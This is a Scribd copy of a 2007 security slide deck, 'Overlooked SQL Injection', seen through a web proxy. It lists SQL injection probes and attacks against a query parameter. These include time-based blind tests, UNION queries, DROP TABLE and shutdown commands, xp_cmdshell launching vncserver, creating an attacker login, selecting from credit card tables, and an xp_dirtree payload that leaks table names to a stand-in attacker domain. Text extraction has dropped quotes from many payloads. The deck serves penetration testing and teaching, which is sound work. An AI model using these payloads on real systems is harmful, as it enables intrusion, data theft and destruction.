Scribd
Upload
78 views16 pages

Overlooked SQL Injection 20071021

This document summarizes overlooked SQL injection techniques in three categories: integers, strings, and attacks. For each category, it lists common tests, overlooked tests that are not usually checked for, and alphanumeric tests involving non-numeric characters. It provides examples for each type of test and overlooked resources for learning about SQL injection. The document aims to bring attention to tests that are often overlooked but still pose security risks.

Uploaded by

Victor Bishop
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
78 views16 pages

Overlooked SQL Injection 20071021

This document summarizes overlooked SQL injection techniques in three categories: integers, strings, and attacks. For each category, it lists common tests, overlooked tests that are not usually checked for, and alphanumeric tests involving non-numeric characters. It provides examples for each type of test and overlooked resources for learning about SQL injection. The document aims to bring attention to tests that are often overlooked but still pose security risks.

Uploaded by

Victor Bishop
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

Overlooked SQL Injection

A short summary of techniques that are often overlooked Paul Battista

Comic Relief

Source: http://xkcd.com/327/

Outline
Integers and other non string values
Common Tests Overlooked Tests Alphanumeric Tests

Strings
Common Tests Overlooked Tests Alphanumeric Tests

Attack Examples
Common Attacks Overlooked Attacks Alphanumeric Attacks

Common Tests on INTs


?errorcode=2 ?errorcode=2 ?errorcode=2 or 1=1 ?errorcode=2 and 1=1 ?errorcode=2 and 1=2 ?errorcode=2;-?errorcode=2;--GARBAGE DATA ?errorcode=2; waitfor DELAY 00:00:20

Overlooked Tests on INTs


?errorcode=(2) ?errorcode=1+1 ?errorcode=(1+1) ?errorcode=2 ?errorcode=% ?errorcode=[0123]

Alphanumeric Tests on INTs


?errorcode=2 RETURN ?errorcode=2 RETRUN ?errorcode=2 SELECT user ?errorcode=2 BEGIN SELECT user END ?errorcode=2 or 1 like 1 ?errorcode=2 and 1 like 1 ?errorcode=2 and 1 like 2

Common Tests on Strings


?errormsg=error ?errormsg=error ?errormsg=error-?errormsg=error and 2=2 ?errormsg=error and 2=2-?errormsg=error waitfor DELAY 00:00:20

Overlooked Tests on Strings


?errormsg=erro+r ?errormsg=error+space(1)+message ?errormsg=err+substring(error,4,1)+r ?errormsg=% ?errormsg=erro% ?errormsg=erro[a-z] ?errormsg=erro[abc]

Alphanumeric Tests on Strings


?errormsg=AAAAAA (7807 Characters)

Common Attacks
?errorcode=2; DROP TABLE tablename ?errorcode=2 UNION SELECT ?errorcode=2; if (SELECT user)=dbo waitfor DELAY 00:00:20 ?errorcode=2 and (substring(apple,1,1))=(a) Username:or 2=2 Password:or 2=2 Username: admin--

Overlooked Attacks
?errorcode=(SELECT TOP 1 name FROM sysobjects WHERE xtype=u) ?errorcode=2 exec master.dbo.xp_cmdshell vncserver (does not require semicolon or quotes if single command) ?errorcode=2 INSERT INTO OPENROWSET() ?errorcode=22; exec(N' declare @s varchar(200); select @s=''\\''+name+''-''+''.AttackersDomain.com\file''f rom sysobjects; exec master.dbo.xp_dirtree @s')

Alphanumeric Attacks
?errorcode=2 UNION SELECT name FROM sysobjects ?errorcode=2 CREATE LOGIN attacker ?errorcode=2 CREATE DATABASE attackersDatabase ?errorcode=2 SELECT name INTO attackerstable FROM sysobjects ?errorcode=2 ALTER TABLE errormessages ADD attackerscolumn INT ?errorcode=2 DROP TABLE tablename ?errorcode=2 shutdown ?errorcode=2 HAVING 1 LIKE 1 (Discloses column name) ?errorcode=2 order by 4 (this helps to disclose the number of columns) ?errorcode=2 USE databasename ?errorcode=2 SELECT null from creditcards ?errorcode=2 SELECT null from nonexistenttable ?errorcode=2 select cardnumber from creditcards ?errorcode=2 select nonexistentcolumn from creditcards ?errorcode=2 or errorcode like 1 ?errorcode=2 or nonexistentcolumn like 1 ?errorcode=2 or errorcode between 0 and 99999999

Common Resources
http://www.ngssoftware.com/research/pap ers/sqlinference.pdf http://www.0x000000.com/?i=14&bin=111 0 http://ferruh.mavituna.com/makale/sqlinjection-cheatsheet/ http://ha.ckers.org/sqlinjection/ http://www.spidynamics.com/assets/docu ments/Blind_SQLInjection.pdf

Overlooked Resources
SQLzoo.net msdn2.microsoft.com Hackme.mightyseek.com http://www.inspectit.se/dc15.html

AlphaNumeric Resources
Just Kidding

Questions & Contact Info


Paul Battista SecurityExperiment.com Paul@SecurityExperiment.com

Sometimes people just have bad ideaswe like to find them

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy